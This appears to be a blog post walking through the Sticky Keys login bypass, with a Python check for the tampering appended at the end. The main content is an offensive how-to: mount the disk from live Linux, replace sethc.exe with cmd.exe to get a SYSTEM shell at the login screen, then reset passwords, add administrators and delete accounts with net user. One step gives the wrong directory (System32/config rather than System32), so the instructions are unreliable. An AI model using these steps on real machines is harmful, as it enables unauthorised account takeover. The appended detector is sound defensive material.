Sticky Keys Windows Login Bypass
Using a live boot of Linux, we can bypass the Windows login by replacing the Sticky Keys executable with a copy of the command prompt. At the Windows login screen, Sticky Keys can then be activated to spawn a shell running as SYSTEM, from which a new user can be created or the password of an existing account changed.
Prerequisites
- Physical access to a Windows machine without BitLocker
- Bootable Linux USB (ideally Kali)
Mount Drive
Create a new directory where the drive will be mounted:

```shell
mkdir FOLDER_NAME
```

List block devices:

```shell
lsblk
```

Mount the primary Windows partition (it should be the largest one there):

```shell
mount /dev/PARTITION_NAME FOLDER_NAME
```

`FOLDER_NAME` is the folder created above.
Update EXE Names
Navigate to `Windows/System32/config` in the mounted drive.

Rename the `sethc.exe` file (this is Sticky Keys):

```shell
mv sethc.exe sethcBackup.exe
```

Make a copy of `cmd.exe` and rename it to `sethc.exe`:

```shell
cp cmd.exe sethc.exe
```
Bypass Login
At the login screen, pressing Shift 5 times should now spawn a shell running as SYSTEM.
Change a Password
```bat
net user USERNAME NEW_PASSWORD
```
Create new Admin
```bat
net user /add USERNAME PASSWORD
net localgroup administrators USERNAME /add
```
Delete User
```bat
net user /delete USERNAME
```
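As an added defensive check (not part of the original post), the Python script below flags the exact modification made in the Update EXE Names step: a `sethc.exe` that is byte-identical to `cmd.exe`, or a leftover `sethcBackup.exe`. The directory holding the two binaries is passed as a parameter (`C:\Windows\System32` on a running host, or the same path under a mount point when inspecting an offline disk); the function name and the hash-comparison approach are this example's own, not the page's.

```python
"""Detect the Sticky Keys replacement described above (added example)."""
import hashlib
import sys
from pathlib import Path
from typing import List

ACCESSIBILITY_BINARY = "sethc.exe"   # Sticky Keys helper, launchable from the login screen
SHELL_BINARY = "cmd.exe"
BACKUP_NAME = "sethcBackup.exe"      # name used by the rename step on this page


def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large binaries are not read into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_sticky_keys(binary_dir: str) -> List[str]:
    """Return a list of findings for the directory; an empty list means nothing found.

    After `cp cmd.exe sethc.exe` the two files are byte-identical, so a matching
    hash is a high-confidence indicator. A mismatch alone does not prove the
    binary is genuine, so pair this with signature checks in a real deployment.
    """
    d = Path(binary_dir)
    findings: List[str] = []
    sethc, cmd = d / ACCESSIBILITY_BINARY, d / SHELL_BINARY
    if not sethc.is_file() or not cmd.is_file():
        findings.append("missing sethc.exe or cmd.exe; cannot compare")
        return findings
    if sha256_of(sethc) == sha256_of(cmd):
        findings.append("sethc.exe is byte-identical to cmd.exe (replaced with a shell)")
    if (d / BACKUP_NAME).exists():
        findings.append(f"{BACKUP_NAME} present (original sethc.exe was renamed)")
    return findings


if __name__ == "__main__":
    # Usage: python check_sethc.py [directory]; defaults to the live System32 folder.
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32"
    for line in check_sticky_keys(target) or ["no Sticky Keys tampering indicators found"]:
        print(line)
```

Run it from a scheduled task or as part of a baseline integrity check; any non-empty result should trigger a restore of the original binary and a review of local account changes (`net user` additions, group membership).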
This post is licensed under CC BY 4.0 by the author.